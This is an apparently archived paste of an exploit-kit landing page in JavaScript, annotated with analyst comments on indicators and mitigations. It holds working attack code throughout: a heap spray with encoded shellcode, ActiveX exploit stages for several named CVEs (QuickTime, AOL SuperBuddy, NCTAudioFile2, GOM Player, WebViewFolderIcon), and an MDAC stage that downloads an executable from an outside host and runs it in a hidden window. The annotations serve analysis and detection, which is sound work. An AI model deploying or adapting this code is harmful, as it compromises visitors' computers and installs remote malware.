
Untitled

a guest
Mar 16th, 2011
  /**
   * Build a string of `len` characters, each picked with Math.random() from
   * a fixed lowercase alphabet.
   *
   * Analyst note: in this listing the only caller is saveAndRun(), which uses
   * a 4-character result as the variable part of the dropped file's name.
   *
   * @param {number} len - number of characters to generate
   * @returns {string} the generated string ('' when len <= 0)
   */
  function getRandomString(len)
  {
      // 25 letters: 'j' is absent from this literal, so it never appears in output.
      var chars = "abcdefghiklmnopqrstuvwxyz";
      var string_length = len;
      var randomstring = '';
      for (var i = 0; i < string_length; i++) {
          // Uniform index into `chars`; Math.random() is not a CSPRNG.
          var rnum = Math.floor(Math.random() * chars.length);
          randomstring += chars.substring(rnum, rnum + 1);
      }
      return randomstring;
  }
  12.  
  /**
   * Try to obtain an automation object called `name` through `CLSID`, using
   * six different call shapes in turn (three CreateObject signatures, then
   * three GetObject signatures). Every failure is swallowed and the next
   * shape is tried.
   *
   * Analyst note: the eval() strings are fixed literals that refer to the
   * local variables `r`, `CLSID` and `name`; no external text is concatenated
   * into them. eval presumably defers the method call so that one unsupported
   * signature does not abort the whole function (TODO confirm).
   *
   * @param {object} CLSID - object expected to expose CreateObject/GetObject
   *        (in this listing, an <object> element created in n0lterOf)
   * @param {string} name - ProgID of the object to create
   * @returns {object|null} first truthy object obtained, or null
   */
  function CreateObj(CLSID, name) {
      var r = null;
      try {
          eval('r = CLSID.CreateObject(name)')
      } catch (e) {}
      if (!r) {
          try {
              eval('r = CLSID.CreateObject(name, "")')
          } catch (e) {}
      }
      if (!r) {
          try {
              eval('r = CLSID.CreateObject(name, "", "")')
          } catch (e) {}
      }
      if (!r) {
          try {
              eval('r = CLSID.GetObject("", name)')
          } catch (e) {}
      }
      if (!r) {
          try {
              eval('r = CLSID.GetObject(name, "")')
          } catch (e) {}
      }
      if (!r) {
          try {
              eval('r = CLSID.GetObject(name)')
          } catch (e) {}
      }
      return (r);
  }
  /**
   * Fetch `url` with a blocking GET on the supplied XMLHTTP-style object and
   * return the raw response body.
   *
   * @param {object} xml - object exposing open/send/responseBody
   * @param {string} url - address to request
   * @returns {*} xml.responseBody on success, or 0 if open/send threw
   */
  function PUQoa75u(xml, url) {
      try {
          // Third argument false = synchronous request.
          xml.open("GET", url, false);
          xml.send(null);
      } catch (e) {
          return 0;
      }
      // No status check is made: any response body, including an error page, is returned.
      return xml.responseBody;
  }
  /**
   * Write `data` to the file `name` through a stream object.
   *
   * Analyst note: the caller in this listing passes an ADODB.Stream. For that
   * object, Type = 1 is binary, Mode = 3 is read/write, and SaveToFile(..., 2)
   * creates the file or overwrites an existing one.
   *
   * @param {object} o - stream object exposing Type/Mode/Open/Write/SaveToFile/Close
   * @param {string} name - destination path
   * @param {*} data - bytes to write (the responseBody from PUQoa75u)
   * @returns {number} 1 on success, 0 if any step threw
   */
  function H5pqBlLZ(o, name, data) {
      try {
          o.Type = 1;
          o.Mode = 3;
          o.Open();
          o.Write(data);
          o.SaveToFile(name, 2);
          o.Close();
      } catch (e) {
          // If a step after Open() fails, Close() is never reached.
          return 0;
      }
      return 1;
  }
  /**
   * Download-and-execute stage: fetch `url`, save the body to
   * c:\win<4 lowercase letters>.exe, then launch that file.
   *
   * Analyst note (detection): the observable behaviour is a browser-hosted
   * script writing an .exe matching c:\winXXXX.exe into the drive root and
   * then starting it with a hidden window. The final argument 0 to both Run
   * and ShellExecute is the window style (hidden).
   *
   * @param {string} url - payload address
   * @param {object} msxml - XMLHTTP-style object used for the download
   * @param {object} adobd - stream object used to write the file
   * @param {object} shell - WScript.Shell (flg == 0) or Shell.Application (flg != 0)
   * @param {number} flg - selects which launch method is called on `shell`
   * @returns {number} 1 if the launch call did not throw, otherwise 0
   */
  function saveAndRun(url, msxml, adobd, shell, flg)
  {
      var retval = 0;
      var data = PUQoa75u(msxml, url);
      // PUQoa75u returns 0 on failure; loose != is used for that sentinel.
      if (data != 0) {
          var name = "c:\\win" + getRandomString(4) + ".exe";
          if (H5pqBlLZ(adobd, name, data) == 1) {
              if (flg == 0) {
                  try {
                      shell.Run(name, 0);
                      retval = 1;
                  } catch (e) {}
              } else {
                  try {
                      shell.ShellExecute(name, "", "", "open", 0);
                      retval = 1;
                  } catch (e) {}
              }
          }
      }
      return retval;
  }
  /**
   * MDAC / MS06-014 stage (per the original comments): uses an <object> with
   * classid BD96C556-65A3-11D0-983A-00C04FC29E36 (RDS.DataSpace) as a factory
   * for an XMLHTTP object, an ADODB.Stream and a shell object, then hands all
   * three to saveAndRun().
   *
   * Analyst notes:
   *  - Indicator from this listing: the host and path held in FileURL. The
   *    request actually sent is FileURL + '0' + loop index; the loop bound
   *    GP_I_QqR is 1, so only the suffix "00" is requested.
   *  - Mitigation: the MS06-014 update, or a kill bit on the classid above,
   *    prevents the control from handing out these objects.
   *
   * @returns {number} result of the first successful saveAndRun() (1), else 0
   */
  function n0lterOf()
  {
  //MDAC
  //MS06-014
      // Slots: [0] HTTP client, [1] ADODB.Stream, [2] shell object.
      var SjGuPMDY = new Array(null, null, null);
      var f8SnLc6m = 0;
      var FileURL = 'http://guuatwe.com/cgi-bin/in.cgi?02010258020000000019f696fa242c146581fe980f';
      var GP_I_QqR = 1;
      try {
          // Becomes 1 when Shell.Application is used instead of WScript.Shell;
          // passed to saveAndRun as `flg`.
          var AwZtzjWT = 0;
          var MTAHFY7C = document.createElement("object");
          MTAHFY7C.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
          if (MTAHFY7C) {
              // Three ProgIDs are tried for the HTTP client, in order.
              SjGuPMDY[0] = CreateObj(MTAHFY7C, "msxml2.XMLHTTP");
              if (!SjGuPMDY[0]) SjGuPMDY[0] = CreateObj(MTAHFY7C, "Microsoft.XMLHTTP");
              if (!SjGuPMDY[0]) SjGuPMDY[0] = CreateObj(MTAHFY7C, "MSXML2.ServerXMLHTTP");
              SjGuPMDY[1] = CreateObj(MTAHFY7C, "ADODB.Stream");
              SjGuPMDY[2] = CreateObj(MTAHFY7C, "WScript.Shell");
              if (!SjGuPMDY[2]) {
                  SjGuPMDY[2] = CreateObj(MTAHFY7C, "Shell.Application");
                  if (SjGuPMDY[2]) AwZtzjWT = 1;
              }
          }
          // Proceed only when all three objects were obtained.
          if (SjGuPMDY[0] && SjGuPMDY[1] && SjGuPMDY[2]) {
              for (var HanQIHas = 0; HanQIHas < GP_I_QqR; HanQIHas++) {
                  var w3l9oW0c = saveAndRun(FileURL + '0' + HanQIHas.toString(), SjGuPMDY[0], SjGuPMDY[1], SjGuPMDY[2], AwZtzjWT);
                  // Keep the first non-zero result.
                  if (!f8SnLc6m)
                  f8SnLc6m = w3l9oW0c;
              }
          }
      } catch (e) {}
      return f8SnLc6m;
  }
  // Global array filled by DnCWiFOj() with the sprayed strings; being global
  // keeps those strings referenced for the life of the page.
  var Cs7_PWfL = new Array();
  // One-shot guard: set to 1 after DnCWiFOj() has filled the array.
  var a3mMODsG = 0;
  /**
   * Called once at the end of DnCWiFOj(). Schedules a call to F0VTp03Y()
   * two seconds later.
   *
   * Analyst note: F0VTp03Y is not defined anywhere in this listing, so as
   * shown the timer would raise a ReferenceError when it fires; it may have
   * existed on the original page or been lost in deobfuscation (unverified).
   * The string form of setTimeout evaluates its argument as code.
   */
  function BElrxd2U()
  {
      // Self-assignment: has no effect on the array.
      Cs7_PWfL = Cs7_PWfL;
      setTimeout("F0VTp03Y()", 2000); //WTF? (note kept from the original paste)
  }
  /**
   * Grow a string by repeated doubling, then cut it to ZKviSpUh / 2
   * characters.
   *
   * The comparisons use length * 2 and the cut uses ZKviSpUh / 2, so
   * ZKviSpUh is evidently a size in bytes at two bytes per character.
   *
   * @param {string} V4VFVTqg - seed pattern (must be non-empty, otherwise the
   *        loop never terminates for a positive target)
   * @param {number} ZKviSpUh - target size in bytes
   * @returns {string} the pattern repeated and truncated to ZKviSpUh / 2 characters
   */
  function MEaQ5wuE(V4VFVTqg, ZKviSpUh)
  {
      while (V4VFVTqg.length * 2 < ZKviSpUh)
      V4VFVTqg += V4VFVTqg;
      V4VFVTqg = V4VFVTqg.substring(0, ZKviSpUh / 2);
      return V4VFVTqg;
  }
  /**
   * Heap-spray stage: fills the global array Cs7_PWfL with large identical
   * strings, each made of 0x0c0c filler followed by the shellcode, so that the
   * later stages (which pass 0x0c0c0c0c or runs of 0x0c bytes to vulnerable
   * controls) presumably land in this data.
   *
   * Analyst notes:
   *  - Each string is filler + shellcode = 0x400000 - 0x38 bytes; the 0x38 is
   *    presumably allowance for allocation overhead (unverified).
   *  - The loop bound is (0x0c0c0c0c - 0x400000) / 0x400000, about 47.2, so 48
   *    strings are stored.
   *  - The final words of the shellcode literal are plain ASCII stored as
   *    little-endian 16-bit units; decoded, they spell a URL on the same host
   *    and path as FileURL in n0lterOf, with a slightly different query string.
   *  - Detection: long unescape("%uXXXX...") literals and rapid growth of
   *    script memory filled with a repeated 0x0c0c pattern are the usual
   *    heuristics for this technique.
   *
   * @returns {number} always 0, so the `||` chain at the bottom of the page
   *          continues to the next stage
   */
  function DnCWiFOj()
  {
  //Shellcode
  //Use http://sandsprite.com/shellcode_2_exe.php
      // Runs once per page: a3mMODsG is set to 1 at the end of this branch.
      if (!a3mMODsG) {
          // Address the spray is sized to reach.
          var MbpsSXDL = 0x0c0c0c0c;
          var shellcode = unescape("%uf633%u09e9%u0001%u5f00%uc033%u0364%u3040%u0c78" +
          "%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34" +
          "%u7c40%u688b%u8b3c%u6af7%u5903%u9ce8%u0000%ue200" +
          "%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b" +
          "%u86e8%u0000%u6800%u3233%u0000%u7568%u6573%u5472" +
          "%u16ff%ue88b%u026a%ue859%u006f%u0000%uf9e2%uec83" +
          "%u8b20%uc7dc%u6303%u5c3a%uc769%u0443%u666e%u2e6f" +
          "%u43c7%u6508%u6578%u6a00%u6a00%u5300%u6a57%uff00" +
          "%u0c56%udc8b%u016a%uff53%u0856%u1a6a%u406a%u56ff" +
          "%u8b04%uebe8%u5f0c%u006a%u6a57%u5500%u006a%u56ff" +
          "%ue814%uffef%uffff%u8b55%u83ec%u0c7d%u750f%ube16" +
          "%u0001%u0000%u5aeb%u8b5f%u83f7%u05c6%u006a%u458b" +
          "%u5008%u56ff%u3310%u5dc0%u10c2%u5100%u8b56%u3c75" +
          "%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149" +
          "%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d" +
          "%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66" +
          "%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359" +
          "%ufe83%u7400%ue805%uff9c%uffff%ue8e8%ufffe%u8eff" +
          "%u0e4e%uecec%u0397%u980c%u8afe%u360e%u2f1a%u8370" +
          "%u5d4f%u60c9%uc308%u68bf%u7474%u3a70%u2f2f%u7567" +
          "%u6175%u7774%u2e65%u6f63%u2f6d%u6763%u2d69%u6962" +
          "%u2f6e%u6e69%u632e%u6967%u303f%u3032%u3031%u3532" +
          "%u3038%u3038%u3030%u3030%u3030%u3130%u6639%u3936" +
          "%u6636%u3261%u3234%u3163%u3634%u3835%u6631%u3965" +
          "%u3038%u0066");
          // Size of one sprayed string (plus 0x38) in bytes.
          var base = 0x400000;
          // Shellcode size in bytes (two bytes per character).
          var K03nKeGs = shellcode.length * 2;
          // Filler size in bytes so that filler + shellcode + 0x38 == base.
          var ZKviSpUh = base - (K03nKeGs + 0x38);
          var V4VFVTqg = unescape("%u0c0c%u0c0c");
          V4VFVTqg = MEaQ5wuE(V4VFVTqg, ZKviSpUh);
          var KGyijR1o = (MbpsSXDL - 0x400000) / base;
          // `i` has no var/let here, so it is an implicit global.
          for (i = 0; i < KGyijR1o; i++) {
              Cs7_PWfL[i] = V4VFVTqg + shellcode;
          }
          a3mMODsG = 1;
          BElrxd2U();
      }
      return 0;
  }
  /**
   * Intended to set a cookie "id=<value>" with path "/" and a one-day expiry.
   * Each exploit stage calls this with its own number just before triggering,
   * presumably so the serving side can tell which stage was attempted
   * (unverified).
   *
   * Analyst note: `todayDate` is not declared anywhere in this listing. As
   * shown, the setDate() line throws a ReferenceError that the empty catch
   * swallows, so no cookie is written unless the original page defined
   * `todayDate` elsewhere. Absence of the "id" cookie therefore does not rule
   * out exposure.
   *
   * @param {number|string} MsXJGK1z - value stored under the cookie name "id"
   */
  function setCookie(MsXJGK1z)
  {
      try {
          var HaD_xOyK = new Date();
          HaD_xOyK.setDate(todayDate.getDate() + 1);
          document.cookie =
          "id=" + MsXJGK1z +
          "; expires=" + HaD_xOyK.toGMTString() +
          "; path=/";
      } catch (e) {}
  }
  /**
   * QuickTime stage (CVE-2007-6166 per the original comments). Probes for an
   * installed QuickTime ActiveX control, then injects a zero-sized <object>
   * whose "src" is a relative URL on the current page, so the browser asks the
   * same server for the media.
   *
   * Analyst notes:
   *  - Version probing: ProgIDs QuickTime.QuickTime.4 through .8 are tried;
   *    the first that instantiates selects the "o6" or "o8" request variant.
   *  - Indicators from this listing: an <object> with classid
   *    02BF25D5-8C17-4B23-BC80-D3488ABDDC6B, width/height 0, autoplay true,
   *    and a follow-up request of the form "?o6&p=...&r=..." or "?o8&...".
   *  - Mitigation: the vendor update for the referenced CVE, or disabling the
   *    QuickTime control in the browser.
   *
   * @returns {number} always 0
   */
  function SOhxTHtY() {
  //Apple QuickTime RTSP Response Header Content-Type Remote Stack Based Buffer Overflow Vulnerability
  //http://www.securityfocus.com/bid/26549/info
  //CVE-2007-6166
      // 0 = no control found; otherwise '6' or '8'.
      var U975d39H = 0;
      var V9f7IKVO;
      for (V9f7IKVO = 4; V9f7IKVO <= 8; V9f7IKVO++) {
          try {
              var dcYpQvmM = new ActiveXObject('QuickTime.QuickTime.' + V9f7IKVO);
              if (dcYpQvmM) {
                  if (V9f7IKVO == 4) U975d39H = '6';
                  else U975d39H = '8';
                  break;
              }
          } catch (e) {}
      }
      if (U975d39H) {
          var Xxgrl_Ht = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0" style="border:0px">' +
          '<param name="src" value="?o' + U975d39H +
          '&p=2180945935&r=606868581">' +
          '<param name="autoplay" value="true">' +
          '<param name="loop" value="false">' +
          '<param name="controller" value="true">' + '</object>';
          // After `break`, V9f7IKVO still holds the version that matched.
          setCookie(V9f7IKVO == 4 ? 6 : 16);
          // The markup is a fixed literal plus '6' or '8'; no external input reaches innerHTML.
          var IhlaMIiq = document.createElement("div");
          IhlaMIiq.innerHTML = Xxgrl_Ht;
          document.body.appendChild(IhlaMIiq);
      }
      return 0;
  }
  /**
   * AOL SuperBuddy stage (CVE-2006-5820 per the original comments). If the
   * Sb.SuperBuddy.1 control instantiates, calls LinkSBIcons with 0x0c0c0c0c,
   * the address the spray in DnCWiFOj() is sized to reach.
   *
   * Analyst note: instantiation of ProgID Sb.SuperBuddy.1 from web content is
   * itself the indicator. Mitigation is the vendor fix for the referenced CVE
   * or a kill bit on the control.
   *
   * @returns {number} always 0
   */
  function u5r_Qafm() {
  //AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability
  //http://www.securityfocus.com/bid/23224/info
  //CVE-2006-5820
      try {
          var tXW7yj4H = new ActiveXObject('Sb.SuperBuddy.1');
          if (tXW7yj4H) {
              setCookie(9);
              tXW7yj4H.LinkSBIcons(0x0c0c0c0c);
          }
      } catch (e) {}
      return 0;
  }
  /**
   * NCTAudioFile2 stage (CVE-2007-0018 per the original comments). Creates an
   * <object> with classid 77829F14-D911-40FF-A2F0-D11DB8D6D0BC and calls
   * SetFormatLikeSample with a 4124-character string of 0x0c.
   *
   * Analyst notes:
   *  - Unlike the other stages, setCookie(3) is called before it is known
   *    whether the control exists; any failure is swallowed by the catch.
   *  - There is no return statement, so the result is undefined (falsy) and
   *    the `||` chain at the bottom of the page continues.
   *  - Mitigation: the vendor fix for the referenced CVE or a kill bit on the
   *    classid above.
   */
  function Fv2QJVho()
  {
  //NCTsoft NCTAudioFile2 ActiveX Control Remote Buffer Overflow Vulnerability
  //http://www.securityfocus.com/bid/22196/info
  //CVE-2007-0018
      try {
          var zLlC1ZgM = document.createElement("object");
          zLlC1ZgM.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");
          var EJqO2XHr = '';
          for (var i = 0; i < 4124; i++)
          EJqO2XHr += "\x0c";
          setCookie(3);
          zLlC1ZgM.SetFormatLikeSample(EJqO2XHr);
      } catch (e) {}
  }
  /**
   * GOM Player stage (CVE-2007-5779 per the original comments). If the
   * GomWebCtrl.GomManager.1 control instantiates, calls OpenURL with a string
   * of 510 characters of 0x0c.
   *
   * Analyst note: instantiation of ProgID GomWebCtrl.GomManager.1 from web
   * content is the indicator. Mitigation is the vendor fix for the referenced
   * CVE or a kill bit on the control.
   *
   * @returns {number} always 0
   */
  function uzbeukYW()
  {
  //http://www.securityfocus.com/bid/26236
  //Gretech GOM Player GomWeb3.DLL Remote Buffer Overflow Vulnerability
  //CVE-2007-5779
      try {
          var dj0JIo5m = new ActiveXObject("GomWebCtrl.GomManager.1");
          if (dj0JIo5m) {
              var scode = '';
              var wzMF9BEs = 510;
              for (var i = 0; i < wzMF9BEs; i++)
              scode += unescape("%0c");
              setCookie(13);
              dj0JIo5m.OpenURL(scode);
          }
      } catch (e) {}
      return 0;
  }
  268.  
  /**
   * WebViewFolderIcon setSlice() stage (per the original comments and the two
   * references below). Instantiates WebViewFolderIcon.WebViewFolderIcon.1 and
   * calls setSlice with 0x7ffffffe and three 0x0c0c0c0c arguments, repeated up
   * to 128 times.
   *
   * Analyst notes:
   *  - setCookie(12) runs unconditionally, before the control is probed.
   *  - Each iteration has its own try/catch, so a missing control yields 128
   *    silent failures rather than an early exit.
   *  - Mitigation: the Microsoft update for this issue or a kill bit on the
   *    control.
   *
   * @returns {number} always 0
   */
  function bF4sn2HS()
  {
  //Internet Explorer WebViewFolderIcon setSlice() Overflow
  //http://www.exploit-db.com/exploits/2440/
  //http://www.securityfocus.com/bid/19030
      setCookie(12);
      for (var i = 0; i < 128; i++)
      {
          try {
              var TNTSnXxZ = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
              TNTSnXxZ.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c);
          } catch (e) {}
      }
      return 0;
  }
  //Run sploits
  // Driver: the stages run left to right through `||`. Every stage except
  // n0lterOf() returns 0 or undefined, so the chain stops early only when
  // n0lterOf() reports a successful download-and-run (1); otherwise all seven
  // stages are attempted. The empty block means the combined result is unused.
  if (n0lterOf() || DnCWiFOj() || SOhxTHtY() || u5r_Qafm() || Fv2QJVho() || uzbeukYW() || bF4sn2HS()) {}
  // After 5 seconds the visitor is sent to a well-known site. The string
  // argument to setTimeout is evaluated as code. For triage, a landing page
  // that probes several ActiveX ProgIDs and then redirects away is a typical
  // exploit-kit pattern.
  setTimeout("window.location = 'http://www.google.com'", 5000);